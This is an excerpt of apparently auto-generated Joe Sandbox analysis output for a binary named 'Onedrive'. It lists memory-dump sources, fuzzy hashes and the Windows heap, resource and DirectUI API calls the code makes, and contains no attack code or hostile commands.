                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Direct$Value@$Element@V12@$CreateDescendent@E__@@@FindInfo@2@PropertyRelease@String@Value@2@@
                                        • String ID: ErrorCID
                                        • API String ID: 3965188616-3250631935
                                        • Opcode ID: 1ee354ba4db03265580357cb67ba2b8d0dd7a090ad87e17df1e797e7864e6d7e
                                        • Instruction ID: 784c40771f161992bffa3a6f59f344b123a04b7184848dccf0ef57afc783bdb5
                                        • Opcode Fuzzy Hash: 1ee354ba4db03265580357cb67ba2b8d0dd7a090ad87e17df1e797e7864e6d7e
                                        • Instruction Fuzzy Hash: A3114C36A0CE82D2EF145B16A95007CBAA4FB8AFA4B489130DD0E87759CF3CE4518701
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: LocaleName
                                        • String ID:
                                        • API String ID: 1723996188-0
                                        • Opcode ID: 90812c785ae45d4dbd0d637aedc98363c098c1fc638e0205df71d1a71fe8337e
                                        • Instruction ID: 15a2630fa223d89093a266462c39cb5251cef265e3788eda7390ea9620a459ed
                                        • Opcode Fuzzy Hash: 90812c785ae45d4dbd0d637aedc98363c098c1fc638e0205df71d1a71fe8337e
                                        • Instruction Fuzzy Hash: B0E1A83260DA82DBE764CB19E49422AB7E0F79C794F144236E68F877A8DB7CD5418F04
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: FreeHeap$ProcessString
                                        • String ID:
                                        • API String ID: 457288585-0
                                        • Opcode ID: b58d795c223e933af8178aaedf77eb8d46f6f4fa86935d1c62db7cd3e1f41b76
                                        • Instruction ID: 678dc069fcef5df56800e3ea548665cac3a9eb54c0a33d98715208f3bdd26174
                                        • Opcode Fuzzy Hash: b58d795c223e933af8178aaedf77eb8d46f6f4fa86935d1c62db7cd3e1f41b76
                                        • Instruction Fuzzy Hash: 0891F621B18F86E5ED509B2AD9483B9A259AF85FF1F488231DE2D8B7C5DF3CE1558300
                                        APIs
                                        • SysFreeString.OLEAUT32 ref: 00007FF6104F4748
                                        • GetProcessHeap.KERNEL32(?,?,?,00007FF6104F4035,00000000,00000000,?,?,00000000,?,?,00007FF6104F3035), ref: 00007FF6104F4758
                                        • HeapFree.KERNEL32(?,?,?,00007FF6104F4035,00000000,00000000,?,?,00000000,?,?,00007FF6104F3035), ref: 00007FF6104F476C
                                        • SysFreeString.OLEAUT32 ref: 00007FF6104F478C
                                        • GetProcessHeap.KERNEL32(?,?,?,00007FF6104F4035,00000000,00000000,?,?,00000000,?,?,00007FF6104F3035), ref: 00007FF6104F479C
                                        • HeapFree.KERNEL32(?,?,?,00007FF6104F4035,00000000,00000000,?,?,00000000,?,?,00007FF6104F3035), ref: 00007FF6104F47B0
                                          • Part of subcall function 00007FF6104F2E94: CompareStringEx.KERNEL32 ref: 00007FF6104F2EC4
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: FreeHeap$String$Process$Compare
                                        • String ID:
                                        • API String ID: 3197231773-0
                                        • Opcode ID: 56f79bf90f11542464ed531c6df6cde9723808e7608c5b96574c2fd091f9801c
                                        • Instruction ID: 8ef79a86df36d5fb92b292e2efcf91ecd536180c54e277423d80ee17b7faa6fb
                                        • Opcode Fuzzy Hash: 56f79bf90f11542464ed531c6df6cde9723808e7608c5b96574c2fd091f9801c
                                        • Instruction Fuzzy Hash: F7415B22619E41E6EE00EF5AE4943BDA7A5FB99F95F488131DA0D8A355DF7CE118C300
                                        APIs
                                        • ?GetContentString@Element@DirectUI@@QEAAPEBGPEAPEAVValue@2@@Z.DUI70 ref: 00007FF6104FB531
                                        • ?Release@Value@DirectUI@@QEAAXXZ.DUI70 ref: 00007FF6104FB544
                                          • Part of subcall function 00007FF6104FAF8C: ?GetContentString@Element@DirectUI@@QEAAPEBGPEAPEAVValue@2@@Z.DUI70(?,?,00000000,00007FF6104F360B), ref: 00007FF6104FAFB3
                                          • Part of subcall function 00007FF6104FAF8C: ?Release@Value@DirectUI@@QEAAXXZ.DUI70(?,?,00000000,00007FF6104F360B), ref: 00007FF6104FB05A
                                          • Part of subcall function 00007FF6104FBB50: StrToID.DUI70(?,?,00000000,00007FF6104FB9AC), ref: 00007FF6104FBB6B
                                          • Part of subcall function 00007FF6104FBB50: ?FindDescendent@Element@DirectUI@@QEAAPEAV12@G@Z.DUI70(?,?,00000000,00007FF6104FB9AC), ref: 00007FF6104FBB7E
                                          • Part of subcall function 00007FF6104FBB50: ?CreateString@Value@DirectUI@@SAPEAV12@PEBGPEAUHINSTANCE__@@@Z.DUI70(?,?,00000000,00007FF6104FB9AC), ref: 00007FF6104FBB96
                                          • Part of subcall function 00007FF6104FB6D8: ?GetSelection@TouchEdit2@DirectUI@@QEAAJPEAJ0@Z.DUI70(?,?,00000000,00007FF6104FB9D1), ref: 00007FF6104FB6F6
                                        • towlower.MSVCRT ref: 00007FF6104FB5E5
                                        • towlower.MSVCRT ref: 00007FF6104FB5F8
                                        • ?SetContentString@Element@DirectUI@@QEAAJPEBG@Z.DUI70 ref: 00007FF6104FB61D
                                        • ?SetCaretPosition@TouchEdit2@DirectUI@@QEAAJJ@Z.DUI70 ref: 00007FF6104FB62F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Direct$Element@String@$ContentValue@$Edit2@Release@TouchV12@Value@2@@memsettowlower$CaretCreateDescendent@E__@@@FindPosition@Selection@
                                        • String ID:
                                        • API String ID: 1728635042-0
                                        • Opcode ID: f8185b381dd9cae6fd31baaa39e3e0ceb803fb853cf683b02eb1faf8e9495004
                                        • Instruction ID: d2a6cd834f4bd35c6165284aa3bc8417f1dcad214acb9bafded875f6023d9a34
                                        • Opcode Fuzzy Hash: f8185b381dd9cae6fd31baaa39e3e0ceb803fb853cf683b02eb1faf8e9495004
                                        • Instruction Fuzzy Hash: F8418E22B04E42EAEF109B6AD4505BC77A4FB89FA9B854131DE0D97748DF38E856C381
                                        APIs
                                        • FindResourceExW.KERNEL32(?,?,?,00007FF6104FC0CB,?,?,00000000,00000000,ComplianceText,00007FF6104F671B), ref: 00007FF6104FBF89
                                        • LoadResource.KERNEL32(?,?,?,00007FF6104FC0CB,?,?,00000000,00000000,ComplianceText,00007FF6104F671B), ref: 00007FF6104FBFA6
                                        • LockResource.KERNEL32(?,?,?,00007FF6104FC0CB,?,?,00000000,00000000,ComplianceText,00007FF6104F671B), ref: 00007FF6104FBFBA
                                        • GetLastError.KERNEL32(?,?,?,00007FF6104FC0CB,?,?,00000000,00000000,ComplianceText,00007FF6104F671B), ref: 00007FF6104FC026
                                        • GetLastError.KERNEL32(?,?,?,00007FF6104FC0CB,?,?,00000000,00000000,ComplianceText,00007FF6104F671B), ref: 00007FF6104FC03C
                                        • GetLastError.KERNEL32(?,?,?,00007FF6104FC0CB,?,?,00000000,00000000,ComplianceText,00007FF6104F671B), ref: 00007FF6104FC052
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: ErrorLastResource$FindLoadLock
                                        • String ID:
                                        • API String ID: 2613642035-0
                                        • Opcode ID: e014c53c1afe5e2e54386c9475865295f837bfc86f6c95a8f9d82f449c7950be
                                        • Instruction ID: 69a803112df2af52e4dd272f7da48883176412dd10ccb7336e858583290c9d5b
                                        • Opcode Fuzzy Hash: e014c53c1afe5e2e54386c9475865295f837bfc86f6c95a8f9d82f449c7950be
                                        • Instruction Fuzzy Hash: 7031AB32A09F86DAEF144F9AA580239B6A4FF89FA0B048134DA4EC7354DF3CE8519714
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Frame$BlockEstablisherHandler3::StateUnwind$ControlFrom$EntryFunctionLookup
                                        • String ID:
                                        • API String ID: 523381305-0
                                        • Opcode ID: 1c938a9c421dafcbaaf4c7f9a1c99e9a12375c26f6b421891ec9a4fd2c3daaf4
                                        • Instruction ID: 19d4675f834eb36528318e65601a869be722c4249117bce0c9037a2730e53509
                                        • Opcode Fuzzy Hash: 1c938a9c421dafcbaaf4c7f9a1c99e9a12375c26f6b421891ec9a4fd2c3daaf4
                                        • Instruction Fuzzy Hash: 52116476A1AA8292C620DF99E44106BA770F7CABD4F605526EA8C43B59CE6DD5408F40
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: String__crt$Info
                                        • String ID: $z
                                        • API String ID: 2508956065-2251613814
                                        • Opcode ID: a1bb79b3926ab07b511d83ff6639c85910dc0fd292b6cb2822028fa61ec3b579
                                        • Instruction ID: 1c3e6a7de18d1f92e0b02d1ef2626bc68de4b1082480090e8637a8f3905471cf
                                        • Opcode Fuzzy Hash: a1bb79b3926ab07b511d83ff6639c85910dc0fd292b6cb2822028fa61ec3b579
                                        • Instruction Fuzzy Hash: 65B12B3260DAC19BD764CB58E08036EFBA1F7D9794F044526EACA83B98CBACD444CF40
                                        APIs
                                        Strings
                                        • (ptloci->lc_category[category].locale != nullptr && ptloci->lc_category[category].refcount != nullptr) || (ptloci->lc_category[cat, xrefs: 00007FF8A0330E3F
                                        • %ls, xrefs: 00007FF8A0330E4B
                                        • minkernel\crts\ucrt\src\appcrt\locale\locale_refcounting.cpp, xrefs: 00007FF8A0330E60
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: __free_lconv_mon__free_lconv_num
                                        • String ID: %ls$(ptloci->lc_category[category].locale != nullptr && ptloci->lc_category[category].refcount != nullptr) || (ptloci->lc_category[cat$minkernel\crts\ucrt\src\appcrt\locale\locale_refcounting.cpp
                                        • API String ID: 2148069796-164516335
                                        • Opcode ID: f8c993c3ac616c137a0244c55a8ab641f86d32dc4a5abb803c8119df114f18a7
                                        • Instruction ID: 99b3a1a52950367e8402b64a56647d09ac867552cc372ee974b4b92b201ac5b8
                                        • Opcode Fuzzy Hash: f8c993c3ac616c137a0244c55a8ab641f86d32dc4a5abb803c8119df114f18a7
                                        • Instruction Fuzzy Hash: 5A915D22619E8692EF50CB45E0D137AA7A0FBC4BC1F055536EA8E4BBA5CFBCD485C700
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: MOC$RCC
                                        • API String ID: 0-2084237596
                                        • Opcode ID: 59c54c8cb16b957d9b1ed07fc171562f92a7a927a343df4c3b5bb3759d843deb
                                        • Instruction ID: 849ecbc99d0981064dfc61a2ffa403c30d750fbf4349b6b411521a7188f6dcbc
                                        • Opcode Fuzzy Hash: 59c54c8cb16b957d9b1ed07fc171562f92a7a927a343df4c3b5bb3759d843deb
                                        • Instruction Fuzzy Hash: 9B91CA72A0ABC6A5E6709F56E4403EAB7A0FB88784F504036EA8D47B99DF7CD544CB00
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,?,00000000,00007FF6104FDACF,?,?,?,00000000,?,?,?,00007FF6104FC83D), ref: 00007FF6104FAB27
                                        • HeapAlloc.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FC83D), ref: 00007FF6104FAB3B
                                        • memmove.MSVCRT(?,?,?,00000000,?,?,?,00007FF6104FC83D), ref: 00007FF6104FAB6F
                                        • GetProcessHeap.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FC83D), ref: 00007FF6104FAB8E
                                        • HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FC83D), ref: 00007FF6104FABA2
                                        • GetProcessHeap.KERNEL32(00000000,?,00000000,00007FF6104FDACF,?,?,?,00000000,?,?,?,00007FF6104FC83D), ref: 00007FF6104FABCB
                                        • HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FC83D), ref: 00007FF6104FABDF
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$Process$Free$Allocmemmove
                                        • String ID:
                                        • API String ID: 3442027419-0
                                        • Opcode ID: dad896d2d793cc911e38404661b56dba7b395c6b74f73abf0410838d05515740
                                        • Instruction ID: c4a6342c12fbf4dd269b6b588d68e3852a900ece26b24cbda1fc14fd9afe25ee
                                        • Opcode Fuzzy Hash: dad896d2d793cc911e38404661b56dba7b395c6b74f73abf0410838d05515740
                                        • Instruction Fuzzy Hash: 8251EA72A08A46E6EE18AF29948407D7696FF89FA0F098438DA4FD3351DE3DF465C305
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$Process$Free$Allocmemmove
                                        • String ID:
                                        • API String ID: 3442027419-0
                                        • Opcode ID: d52f1c5daf9b55119971937f55c72f90c6fe77c5cc7fbe569b2c6201aa31f2e0
                                        • Instruction ID: d4a20c382034e54aa6c5cc2cd0b2d5a3897a43ac71fc9819a71232add545c5b2
                                        • Opcode Fuzzy Hash: d52f1c5daf9b55119971937f55c72f90c6fe77c5cc7fbe569b2c6201aa31f2e0
                                        • Instruction Fuzzy Hash: F341B226A08F42E7EE159F5AA480139BAA5BF88FE0F099034DE4E87754DF3CE8518300
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Concurrency::details::_SchedulerScheduler::_new[]
                                        • String ID: minkernel\crts\ucrt\src\appcrt\mbstring\mbctype.cpp
                                        • API String ID: 3742145013-426720447
                                        • Opcode ID: 60669bbcb90472b39e6566556282e0c1fef63ff969ffe470ccdd1451293b4045
                                        • Instruction ID: d156badd09899be1e8eb40dc8ddf6894d6fa5330d9e74821a8643168e55897aa
                                        • Opcode Fuzzy Hash: 60669bbcb90472b39e6566556282e0c1fef63ff969ffe470ccdd1451293b4045
                                        • Instruction Fuzzy Hash: 4B51323261EA83A6E760DB15E4542BE73A0FBD8794F504132E69D87BE6DF2CD504CB40
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$Process$Free$Allocmemmove
                                        • String ID:
                                        • API String ID: 3442027419-0
                                        • Opcode ID: dd59d9a7f5ff281a3a5ac38261a22c1cfc43348459e99cafb0c1c9f369091ba9
                                        • Instruction ID: 23b387208a354d26a1071c1455c61e592570cdd2dca9d7370402c330941336ac
                                        • Opcode Fuzzy Hash: dd59d9a7f5ff281a3a5ac38261a22c1cfc43348459e99cafb0c1c9f369091ba9
                                        • Instruction Fuzzy Hash: FE41B422A08F82D7EE14AF5A658017DB6A6BF99FE1B09C034DE6E87755DF3CE4518300
                                        APIs
                                        • GetProcessHeap.KERNEL32(?,?,0000200000000000,00007FF6104F65C4,?,?,?,?,?,?,?,?,?,00007FF6104F7F0D), ref: 00007FF6104F6377
                                        • HeapAlloc.KERNEL32(?,?,0000200000000000,00007FF6104F65C4,?,?,?,?,?,?,?,?,?,00007FF6104F7F0D), ref: 00007FF6104F638B
                                        • memmove.MSVCRT(?,?,0000200000000000,00007FF6104F65C4,?,?,?,?,?,?,?,?,?,00007FF6104F7F0D), ref: 00007FF6104F63BC
                                        • GetProcessHeap.KERNEL32(?,?,0000200000000000,00007FF6104F65C4,?,?,?,?,?,?,?,?,?,00007FF6104F7F0D), ref: 00007FF6104F63D2
                                        • HeapFree.KERNEL32(?,?,0000200000000000,00007FF6104F65C4,?,?,?,?,?,?,?,?,?,00007FF6104F7F0D), ref: 00007FF6104F63E6
                                        • GetProcessHeap.KERNEL32(?,?,0000200000000000,00007FF6104F65C4,?,?,?,?,?,?,?,?,?,00007FF6104F7F0D), ref: 00007FF6104F6414
                                        • HeapFree.KERNEL32(?,?,0000200000000000,00007FF6104F65C4,?,?,?,?,?,?,?,?,?,00007FF6104F7F0D), ref: 00007FF6104F6428
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$Process$Free$Allocmemmove
                                        • String ID:
                                        • API String ID: 3442027419-0
                                        • Opcode ID: e3ea0ae9526573e326e153ee29c05e8328531308f38c4549085912ce3cfad05f
                                        • Instruction ID: 2d627c07943702ae0e9281b0c20d04d204f2f51dedee0dd6a3d8b007ee552f53
                                        • Opcode Fuzzy Hash: e3ea0ae9526573e326e153ee29c05e8328531308f38c4549085912ce3cfad05f
                                        • Instruction Fuzzy Hash: 76318222A08F52D7EE14AB6AA54547DBAA6FF89FE1B0A8034DE0D83355DF3CE4558301
                                        APIs
                                        • GetProcessHeap.KERNEL32(?,00000000,00000000,00007FF6104FD591,?,00000000,00000000,00007FF6104FD1A7,?,?,00000000), ref: 00007FF6104F96BF
                                        • HeapAlloc.KERNEL32(?,00000000,00000000,00007FF6104FD591,?,00000000,00000000,00007FF6104FD1A7,?,?,00000000), ref: 00007FF6104F96D3
                                        • memmove.MSVCRT(?,00000000,00000000,00007FF6104FD591,?,00000000,00000000,00007FF6104FD1A7,?,?,00000000), ref: 00007FF6104F9700
                                        • GetProcessHeap.KERNEL32(?,00000000,00000000,00007FF6104FD591,?,00000000,00000000,00007FF6104FD1A7,?,?,00000000), ref: 00007FF6104F9716
                                        • HeapFree.KERNEL32(?,00000000,00000000,00007FF6104FD591,?,00000000,00000000,00007FF6104FD1A7,?,?,00000000), ref: 00007FF6104F972A
                                        • GetProcessHeap.KERNEL32(?,00000000,00000000,00007FF6104FD591,?,00000000,00000000,00007FF6104FD1A7,?,?,00000000), ref: 00007FF6104F9758
                                        • HeapFree.KERNEL32(?,00000000,00000000,00007FF6104FD591,?,00000000,00000000,00007FF6104FD1A7,?,?,00000000), ref: 00007FF6104F976C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$Process$Free$Allocmemmove
                                        • String ID:
                                        • API String ID: 3442027419-0
                                        • Opcode ID: c9fe35422332f408aca34dfc3986990ec640009ac1058576df87ad1f4ad7d076
                                        • Instruction ID: d14bf3bbc33fa007d92a9ec7d8c89608e9f39ff3e885c37a5a0162823bd643bc
                                        • Opcode Fuzzy Hash: c9fe35422332f408aca34dfc3986990ec640009ac1058576df87ad1f4ad7d076
                                        • Instruction Fuzzy Hash: 07319226A09F42D6EE15AF9A654407ABAD5BF89FE1B0A8034DE0DC3355DF3CE8118301
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
